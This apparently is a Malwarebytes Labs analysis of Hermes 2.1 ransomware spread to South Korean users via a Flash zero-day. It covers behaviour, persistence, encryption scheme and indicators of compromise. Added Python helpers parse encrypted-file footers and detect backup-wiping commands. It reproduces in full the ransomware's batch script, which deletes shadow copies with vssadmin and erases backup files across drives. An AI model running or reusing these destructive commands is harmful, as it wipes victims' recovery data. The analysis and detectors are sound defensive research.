By checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.

We replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries that are part of the self-hosted OpenX server. Instead, we found that it was hiding in the main page’s source code.

We had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blob that went through Base64 and RC4 encoding (we would like to thank David Ledbetter for that).

Hermes ransomware

The payload from this attack is Hermes ransomware, version 2.1.

Behavioral analysis

The ransomware copies itself into %TEMP% under the name svchosta.exe and redeploys itself from that location. The initial sample is then deleted.

The ransomware is not particularly stealthy—some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:

The authors didn’t bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and by this way it tries to force the user into accepting it. But even if we don’t let the batch script be deployed, the main executable proceeds with encryption.

The batch script is responsible for removing the shadow copies and other possible backups:

It is dropped inside C:\Users\Public along with some other files:

The file “PUBLIC” contains a blob with an RSA public key. It is worth noting that this key is unique on each run, so the RSA key pair is generated per victim. Example:

Another file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:

Analyzing the blob header, we find the following information:

The rest of the data is encrypted—at this moment, we can guess that it is encrypted by the RSA public key of the attackers.

The same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.

The interesting fact is that, depending on the campaign, in some of the samples the authors used BitMessage to communicate with victims:

This method was used in the past by a few other authors, for example in Chimera ransomware, and by the author of original Petya in his affiliate programs.

Encrypted files don’t have their names changed. Each file is encrypted with a new key, so the same plaintext produces different ciphertexts. The entropy of the encrypted file is high, and no patterns are visible. That suggests that some stream cipher or a cipher with chained blocks was used. (The most commonly used in such cases is AES in CBC mode, but we can be sure only after analyzing the code.) Below, you can see a visualization of a BMP file before and after being encrypted by Hermes:


Inside each file, after the encrypted content, there is a “HERMES” marker, followed by another blob:

This time the blob contains an exported session key (0x01 : SIMPLEBLOB) and the algorithm identifier is AES (0x6611: CALG_AES). We can make an educated guess that it is the AES key for the file, encrypted by the victim’s RSA key (from the generated pair).
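A small forensic helper for that per-file footer, added here as an example and not part of the Malwarebytes analysis: it finds the trailing “HERMES” marker and parses the CryptoAPI BLOBHEADER that follows it (bType 0x01 for SIMPLEBLOB, bVersion 0x02, a reserved word, then the ALG_ID 0x6611 for CALG_AES), followed by the ALG_ID of the key that wrapped the session key and the wrapped key bytes. That a SIMPLEBLOB's second ALG_ID is the key-exchange algorithm is standard CryptoAPI layout; the choice of CALG_RSA_KEYX, the 256-byte wrapped key and the dummy content in the sample file are constructed for the example, and the exact byte layout between the marker and the blob in real Hermes files is an assumption to verify against a sample.

```python
"""Parse the HERMES marker and exported session-key blob appended to each encrypted file (added example)."""
import struct

MARKER = b"HERMES"
SIMPLEBLOB = 0x01          # bType of an exported session key
CUR_BLOB_VERSION = 0x02    # bVersion
CALG_AES = 0x6611          # aiKeyAlg seen in the footer
CALG_RSA_KEYX = 0xA400     # key-exchange ALG_ID assumed for the sample (RSA wrap)
BLOBHEADER = "<BBHI"       # bType, bVersion, reserved, aiKeyAlg (all little-endian)


def parse_hermes_footer(data: bytes):
    """Return a dict describing the footer, or None if the file carries no HERMES footer."""
    pos = data.rfind(MARKER)
    if pos < 0:
        return None
    blob = data[pos + len(MARKER):]
    if len(blob) < struct.calcsize(BLOBHEADER) + 4:
        return None                         # marker present but no complete SIMPLEBLOB behind it
    btype, bver, reserved, key_alg = struct.unpack_from(BLOBHEADER, blob, 0)
    # A SIMPLEBLOB continues with the ALG_ID of the wrapping key, then the wrapped key itself.
    wrap_alg = struct.unpack_from("<I", blob, 8)[0]
    wrapped = blob[12:]
    return {
        "marker_offset": pos,
        "encrypted_len": pos,               # everything before the marker is ciphertext
        "is_simpleblob": btype == SIMPLEBLOB and bver == CUR_BLOB_VERSION and reserved == 0,
        "key_alg": key_alg,
        "key_alg_is_aes": key_alg == CALG_AES,
        "wrap_alg": wrap_alg,
        "wrapped_key_len": len(wrapped),
    }


def build_sample_file(content_len: int = 64, wrapped_len: int = 256) -> bytes:
    """Constructed stand-in for an encrypted file: dummy content, marker, then a SIMPLEBLOB."""
    header = struct.pack(BLOBHEADER, SIMPLEBLOB, CUR_BLOB_VERSION, 0, CALG_AES)
    header += struct.pack("<I", CALG_RSA_KEYX)
    return bytes(content_len) + MARKER + header + b"\xAA" * wrapped_len


if __name__ == "__main__":
    print(parse_hermes_footer(build_sample_file()))
```

Run over a directory, the `is_simpleblob` and `key_alg_is_aes` flags give a quick way to separate files Hermes actually touched from files that merely look high-entropy, and `encrypted_len` tells you how much of the original is recoverable should the victim's private key ever become available.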

The ransomware achieves persistence by dropping a batch script in the Startup folder:

The script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.

So, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That’s why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.

Inside the ransomware

Execution flow

At the beginning of the execution, the ransomware creates a mutex named “tech”:

The sample is mildly obfuscated, for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during the execution, so, at first we will not see the typical strings.

First, the executable begins to dynamically load all its imports via a function at 4023e0:

It then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian is found as the system language, it exits the process (0x419 being Russian, 0x422 Ukrainian, and 0x423 Belarusian).

It then creates two cmd.exe subprocesses: one that copies itself into the directory appdata/local/temp/svchost.exe, and another that executes the copied file.

It also generates crypto keys using the standard CryptAcquireContext API, and saves the public key and some kind of ID into the following files:



As mentioned earlier, it writes a script with the contents start “” %TEMP%\svchosta.exe into the Start menu Startup folder so that it auto-runs on startup. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved the public key into a file so that it can later find that key and continue encrypting with a consistent key across all executions.

Below is the function that calls all of this functionality sequentially, labeled:

It proceeds to cycle through all available drives, skipping any CD-ROM drive. Inside the function, it goes through all files and folders on the drive, but skips a few key directories, including (but not limited to) Windows, Mozilla, and the recycle bin.

Inside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:

It then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called window.bat to delete shadow volume and backup files. Here is its content:

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:*.VHD c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:backup*.* c:*.set c:*.win c:*.dsk
del /s /f /q d:*.VHD d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:backup*.* d:*.set d:*.win d:*.dsk
del /s /f /q e:*.VHD e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:backup*.* e:*.set e:*.win e:*.dsk
del /s /f /q f:*.VHD f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:backup*.* f:*.set f:*.win f:*.dsk
del /s /f /q g:*.VHD g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:backup*.* g:*.set g:*.win g:*.dsk
del /s /f /q h:*.VHD h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:backup*.* h:*.set h:*.win h:*.dsk
del %0

It then creates and executes another bat file called svchostaaexe.bat that walks the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware look for backup files in such detail.
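As an added example (not part of the original analysis), a small Python detector that flags the shadow-copy tampering and backup-deletion commands from window.bat in constructed process-creation log records; the record format and the rule names are my own assumptions:

```python
import re

# Rule set derived from the window.bat contents above (constructed here, not
# taken from the original analysis). Log records below are constructed as well.
RULES = [
    ("shadow_copy_deletion",  re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    ("shadow_storage_resize", re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b", re.I)),
    ("backup_file_deletion",  re.compile(r"\bdel\s+(/[sfq]\s+){1,3}.*\.(vhd|bac|bak|wbcat|bkf|set|win|dsk)\b", re.I)),
    ("batch_self_delete",     re.compile(r"\bdel\s+%0\b", re.I)),
]

def classify_command(cmdline):
    """Return the names of all rules that match a single command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan_log(lines):
    """Parse 'timestamp|image|command line' records and return every hit as a
    (timestamp, image, rule) tuple, in log order."""
    hits = []
    for line in lines:
        parts = line.split("|", 2)
        if len(parts) != 3:
            continue  # malformed record, skip it
        ts, image, cmd = (p.strip() for p in parts)
        for rule in classify_command(cmd):
            hits.append((ts, image, rule))
    return hits

# Constructed Sysmon-style process creation records: time|image|command line.
SAMPLE_LOG = [
    "2018-03-09T10:01:02|C:\\Windows\\System32\\cmd.exe|cmd /c vssadmin Delete Shadows /all /quiet",
    "2018-03-09T10:01:03|C:\\Windows\\System32\\vssadmin.exe|vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB",
    "2018-03-09T10:01:04|C:\\Windows\\System32\\cmd.exe|cmd /c del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak",
    "2018-03-09T10:01:05|C:\\Windows\\System32\\cmd.exe|cmd /c del %0",
    "2018-03-09T10:05:00|C:\\Windows\\System32\\cmd.exe|cmd /c dir c:\\users",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```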

There is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which contains the unique ID you have to send to the email address, must be encrypted with the public key of a key pair that the attackers pre-generated and retain on their side.

We found heavy code reuse from older versions of Hermes in this one. The code flow looks a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.

Below are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.

The new version:

And the old version 237eee069c1df7b69cee2cc63dee24e6:

Attacked targets

The ransomware targets files with the following extensions:

tif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih 
gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat


Hermes, like many other ransomware families, uses AES together with RSA for the encryption: AES with a random key is used to encrypt files, and RSA is used to protect the random AES key.

The ransomware uses two RSA key pairs. The first belongs to the attackers; only its public key is hardcoded in the sample.

The second key pair belongs to the victim and is generated at the beginning of the attack. The private key of this pair is encrypted with the attackers’ public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.

When the victim sends this file, the attackers can recover the victim’s private key with the help of their own private key. The victim’s public key is stored in clear text in the file PUBLIC. It is later used to encrypt the random AES keys, which are generated per file.

Cryptography is implemented with the Windows Crypto API. Function calls are mildly obfuscated: pointers to the functions are resolved manually.

Processing of each file starts with a check whether it was already encrypted. The ransomware uses the marker “HERMES” that we already saw during the behavioral analysis. The marker is stored at the end of the file, just before the block where the AES key is saved, at an offset of 274 bytes from the end. So, first the file pointer is set to this position and the characters there are compared against the marker.

If the marker is found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the function responsible. Unfortunately for the victims, the authors used the secure function CryptGenKey:

The algorithm identifier used is 0x6610 (CALG_AES_256), meaning AES with a 256-bit key. This key is used to encrypt the content of the file. The file is read and encrypted in chunks of 1,000,000 bytes each.

At the end, the marker “HERMES” is written and the exported AES key is saved:

The handle to the attackers’ RSA public key is passed, so the function CryptExportKey automatically takes care of protecting the AES key. Only the owner of the corresponding RSA private key will be able to import it back.
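As an added triage helper (my own code, not from the original analysis), the following Python checks a file for the “HERMES” marker 274 bytes from the end and splits off the trailing key block. The SIMPLEBLOB layout it assumes for that block (BLOBHEADER, wrapping ALG_ID, RSA-wrapped AES key) is an inference from the CryptExportKey usage described above, not something the analysis states.

```python
import struct

MARKER = b"HERMES"                  # marker written before the key block
MARKER_OFFSET_FROM_END = 274        # marker position given in the analysis
KEY_BLOCK_LEN = MARKER_OFFSET_FROM_END - len(MARKER)   # 268 bytes follow the marker
# Assumption (not stated in the analysis): the 268-byte block is the raw
# CryptExportKey SIMPLEBLOB: BLOBHEADER (8 bytes) + wrapping ALG_ID (4 bytes)
# + RSA-wrapped AES key, which with a 2048-bit RSA key is exactly 268 bytes.
SIMPLEBLOB = 0x01
CALG_AES_256 = 0x6610               # algorithm identifier cited in the analysis
CALG_RSA_KEYX = 0xA400              # Windows ALG_ID for RSA key exchange

def is_hermes_encrypted(data):
    """True if the HERMES marker sits exactly 274 bytes before the end of the file."""
    if len(data) < MARKER_OFFSET_FROM_END:
        return False
    pos = len(data) - MARKER_OFFSET_FROM_END
    return data[pos:pos + len(MARKER)] == MARKER

def split_hermes_file(data):
    """Return (ciphertext, key_block); raise ValueError if the marker is absent."""
    if not is_hermes_encrypted(data):
        raise ValueError("HERMES marker not found at the expected offset")
    cut = len(data) - MARKER_OFFSET_FROM_END
    return data[:cut], data[cut + len(MARKER):]

def parse_key_block(block):
    """Interpret the trailing block as a SIMPLEBLOB (assumption above) and report
    whether its header fields are consistent with that layout."""
    if len(block) != KEY_BLOCK_LEN:
        raise ValueError("unexpected key block length %d" % len(block))
    b_type, b_version, _reserved, key_alg, wrap_alg = struct.unpack("<BBHII", block[:12])
    plausible = (b_type == SIMPLEBLOB and b_version == 2
                 and key_alg == CALG_AES_256 and wrap_alg == CALG_RSA_KEYX)
    return {"type": b_type, "version": b_version, "key_alg": key_alg,
            "wrap_alg": wrap_alg, "wrapped_key": block[12:],
            "looks_like_simpleblob": plausible}

def build_sample():
    """Constructed test file: dummy ciphertext, the marker, then a fake key block."""
    header = struct.pack("<BBHII", SIMPLEBLOB, 2, 0, CALG_AES_256, CALG_RSA_KEYX)
    wrapped = bytes(range(256))     # stand-in for the RSA-encrypted AES key
    return b"\x00" * 1000 + MARKER + header + wrapped
```

The wrapped key block is only useful to whoever holds the matching RSA private key; for a defender the value of the check is fast, reliable identification of which files the sample touched.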


Malwarebytes users are protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.


Another campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware—namely Magniber. That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.

After analyzing the sample, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.

Although the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.

Indicators of compromise

Domains involved in campaign:


IP addresses:

  • 159.65.131[.]94
  • 207.148.104[.]5

Hermes 2.1 ransomware:

  • A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2
  • pretty040782@gmail[.]com
  • pretty040782@keemail[.]me

The post Hermes ransomware distributed to South Koreans via recent Flash zero-day appeared first on Malwarebytes Labs.

Author: Malwarebytes Labs